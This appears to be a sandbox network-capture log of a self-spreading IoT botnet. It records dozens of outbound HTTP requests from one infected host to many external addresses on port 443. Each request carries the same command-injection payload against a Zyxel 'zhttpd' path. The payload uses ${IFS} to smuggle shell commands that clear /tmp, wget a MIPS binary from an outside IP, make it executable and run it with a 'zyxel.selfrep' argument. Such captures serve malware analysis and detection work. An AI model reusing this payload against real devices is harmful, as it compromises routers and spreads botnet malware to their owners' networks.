                                      Jan 19, 2024 17:29:33.799223900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4803192.168.2.143981695.216.231.3443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.799254894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4804192.168.2.1459570169.49.111.79443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.799314976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4805192.168.2.1449006196.217.11.118443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.802877903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4806192.168.2.144703241.30.141.75443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.802915096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4807192.168.2.143681450.12.237.221443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.802964926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4808192.168.2.1444772109.196.87.255443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.803023100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4809192.168.2.1434278152.193.116.2443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.803050041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4810192.168.2.1447906132.178.46.253443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.803072929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4811192.168.2.1448216210.34.223.89443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.803114891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4812192.168.2.1432912218.76.235.22443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.803143024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4813192.168.2.1454484117.216.34.231443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.803174019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4814192.168.2.143782040.246.1.134443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.803205967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4815192.168.2.143322459.52.4.120443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.803251028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4816192.168.2.144607035.48.154.106443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.803281069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4817192.168.2.146037068.73.76.209443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.803339005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4818192.168.2.1454022200.113.58.164443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.812390089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4819192.168.2.1456310129.183.46.229443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.812422037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4820192.168.2.145294089.103.49.71443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.812484980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4821192.168.2.145201434.121.179.95443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.812540054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4822192.168.2.1459770171.17.31.32443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.812587976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4823192.168.2.1455674125.57.134.120443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.812623024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4824192.168.2.1453862197.169.92.219443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.812648058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4825192.168.2.1459718161.81.180.42443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.812836885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4826192.168.2.1455948185.64.34.130443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.812870026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4827192.168.2.1458374168.192.112.92443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.812907934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4828192.168.2.1451826138.112.245.228443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.812966108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4829192.168.2.1455992116.142.158.44443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.813000917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4830192.168.2.1454508222.96.239.252443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.813059092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4831192.168.2.1454658197.251.123.140443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.813107014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4832192.168.2.1458070184.144.147.129443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.813143969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4833192.168.2.145504823.37.238.42443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.813169956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4834192.168.2.1459368159.19.171.17443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.813209057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4835192.168.2.1454598170.47.100.140443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.813251019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4836192.168.2.144965451.121.183.87443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.813283920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4837192.168.2.1451092101.175.25.154443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.813335896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4838192.168.2.1449260164.121.65.104443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.813374996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4839192.168.2.1460074208.93.66.111443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.813431025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4840192.168.2.1438360179.65.189.42443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.813474894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4841192.168.2.1445050161.67.141.218443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.813517094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4842192.168.2.144431851.160.110.65443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.813561916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4843192.168.2.143482061.166.190.149443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.813620090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4844192.168.2.1454476118.92.144.196443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.813654900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4845192.168.2.145538279.23.185.63443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.813688040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4846192.168.2.144921232.12.209.107443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.813714981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4847192.168.2.144437657.92.194.76443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.813769102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4848192.168.2.1442862184.154.252.34443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.813801050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4849192.168.2.143437097.215.100.99443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.813857079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4850192.168.2.1435530124.244.35.137443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.813900948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4851192.168.2.145756683.87.233.97443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.813940048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4852192.168.2.1445978137.101.178.135443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.813972950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4853192.168.2.1438898135.111.161.50443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.814002037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4854192.168.2.1456406132.143.59.130443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.814049959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4855192.168.2.14601725.21.75.240443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.814084053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4856192.168.2.1455380176.204.63.207443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.814117908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4857192.168.2.1453790108.44.54.221443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.814173937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4858192.168.2.144645862.149.15.131443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.814203024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4859192.168.2.1453584123.112.14.177443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.814241886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4860192.168.2.1444000146.111.128.46443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.814306021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4861192.168.2.144065835.45.12.98443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.814337015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4862192.168.2.144076499.184.225.129443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.814349890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4863192.168.2.1452152147.46.252.207443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.814434052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4864192.168.2.1455272196.221.4.95443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.814457893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4865192.168.2.143507018.154.126.251443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.814492941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4866192.168.2.1453012112.78.225.219443
                                      TimestampBytes transferredDirectionData
